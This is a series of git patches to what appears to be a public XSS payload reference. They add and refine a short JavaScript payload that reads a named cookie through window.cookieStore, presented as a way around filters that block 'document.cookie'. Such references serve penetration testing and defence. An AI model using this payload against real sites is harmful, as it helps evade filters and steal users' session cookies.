From 5d561ea7d6e726a326a0bc6baecf245327143fb5 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:23:36 -0500 Subject: [PATCH 1/6] Added document.cookie blacklist bypass Added an alternative to document.cookie for situations when this text is blacklisted. --- XSS Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 6cb88ea..a079cf6 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -54,6 +54,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass space filter](#bypass-space-filter) - [Bypass email filter](#bypass-email-filter) - [Bypass document blacklist](#bypass-document-blacklist) + - [Bypass document.cookie blacklist](#bypass-document.cookie-blacklist) - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) @@ -774,6 +775,14 @@ $ echo "" | xxd window["doc"+"ument"] ``` +### Bypass document.cookie blacklist + +This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. + +``` +const cookiePromise=Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);}); +``` + ### Bypass using javascript inside a string ```javascript From f23f28c4e235ec35128a05ac8f5cf3af91cf13e3 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:43:54 -0500 Subject: [PATCH 2/6] Shortened payload Shortened the document.cookie blacklist bypass payload. --- XSS Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index a079cf6..bbbaaf5 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -780,7 +780,7 @@ window["doc"+"ument"] This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. ``` -const cookiePromise=Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);}); +Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);}); ``` ### Bypass using javascript inside a string From 9a42be1113d78ba26bc91e6761a595b745e9a2b4 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:45:55 -0500 Subject: [PATCH 3/6] Replaced console.log with alert It's more common to want alert screenshots vs console screenshots. --- XSS Injection/README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index bbbaaf5..ce1abe9 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -117,7 +117,6 @@ Obtains the administrator cookie or sensitive access token, the following payloa Write the collected data into a file. -```php {console.log(cookieValue.value);}); +Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{alert(cookieValue.value);}); ``` ### Bypass using javascript inside a string From 9ee8f092cd44b73e025eb14bde12425bc2c727b1 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:46:52 -0500 Subject: [PATCH 4/6] Changed link for document.cookie blacklist Link was not working due to use of period in title. --- XSS Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index ce1abe9..2f624de 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -54,7 +54,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass space filter](#bypass-space-filter) - [Bypass email filter](#bypass-email-filter) - [Bypass document blacklist](#bypass-document-blacklist) - - [Bypass document.cookie blacklist](#bypass-document.cookie-blacklist) + - [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist) - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) From fbed4254e5b04220f57417a496736250a69576cd Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:52:07 -0500 Subject: [PATCH 5/6] Fixed an oops Somehow I deleted line 120 in a prior commit. Fixed. --- XSS Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 2f624de..3c5886f 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -117,6 +117,7 @@ Obtains the administrator cookie or sensitive access token, the following payloa Write the collected data into a file. +```php Date: Thu, 13 Oct 2022 19:48:20 -0500 Subject: [PATCH 6/6] Shortened payload Make payload shorter. --- XSS Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 3c5886f..fb64357 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -780,7 +780,7 @@ window["doc"+"ument"] This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. ``` -Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{alert(cookieValue.value);}); +window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); ``` ### Bypass using javascript inside a string